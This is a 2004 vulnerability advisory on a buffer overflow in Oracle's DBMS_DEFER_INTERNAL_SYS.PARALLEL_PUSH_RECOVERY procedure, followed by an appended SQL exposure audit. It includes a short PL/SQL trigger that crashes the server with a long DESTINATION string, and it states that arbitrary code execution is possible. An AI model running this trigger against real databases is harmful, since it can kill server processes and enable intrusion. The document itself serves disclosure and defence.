#31 - Buffer overflow in procedure PARALLEL_PUSH_RECOVERY of DBMS_DEFER_INTERNAL_SYS package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Low
Details:
When the PARALLEL_PUSH_RECOVERY procedure is called with a long string in the DESTINATION parameter, a buffer overflow occurs.
To reproduce the overflow, execute the following PL/SQL:
DECLARE
  P_DESTINATION VARCHAR2(32767);
  P_ORIGIN VARCHAR2(32767);
BEGIN
  P_DESTINATION := 'longstring';
  P_ORIGIN := '';
  SYS.DBMS_DEFER_INTERNAL_SYS.PARALLEL_PUSH_RECOVERY(DESTINATION => P_DESTINATION, ORIGIN => P_ORIGIN);
END;
Analysis:
This vulnerability can be exploited by members of the SYSDBA role and by users granted execute permission on the DBMS_DEFER_INTERNAL_SYS package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause a denial of service (DoS) by killing the Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g is not vulnerable.
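To check exposure on a given instance, the queries below show the version banner and list the accounts named in the Analysis section: SYSDBA members and holders of EXECUTE on the package, whether granted directly or inherited through roles. This is an added example, not part of the original advisory; it assumes an account that can read the DBA_* and V$ views, and `<grantee>` is a placeholder.

```sql
-- Added example: exposure audit for SYS.DBMS_DEFER_INTERNAL_SYS.
-- Assumes the session can read the DBA_* dictionary views and V$ views.

-- 1. Version banner: compare against the fixed release stated in the
--    advisory (Patchset 4, 9.2.0.5).
SELECT banner FROM v$version;

-- 2. Accounts with SYSDBA in the password file.
SELECT username
  FROM v$pwfile_users
 WHERE sysdba = 'TRUE';

-- 3. Direct EXECUTE grants on the package (grantee may be a user,
--    a role, or PUBLIC).
SELECT grantee, grantor, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_DEFER_INTERNAL_SYS'
   AND privilege = 'EXECUTE'
 ORDER BY grantee;

-- 4. Users and roles that inherit the grant through role membership,
--    walking nested roles with a hierarchical query.
SELECT DISTINCT rp.grantee
  FROM dba_role_privs rp
 START WITH rp.granted_role IN (
         SELECT tp.grantee
           FROM dba_tab_privs tp
          WHERE tp.owner = 'SYS'
            AND tp.table_name = 'DBMS_DEFER_INTERNAL_SYS'
            AND tp.privilege = 'EXECUTE')
CONNECT BY PRIOR rp.grantee = rp.granted_role
 ORDER BY rp.grantee;

-- 5. Remove a grant that is not needed (<grantee> is a placeholder;
--    confirm nothing depends on it before revoking).
-- REVOKE EXECUTE ON SYS.DBMS_DEFER_INTERNAL_SYS FROM <grantee>;
```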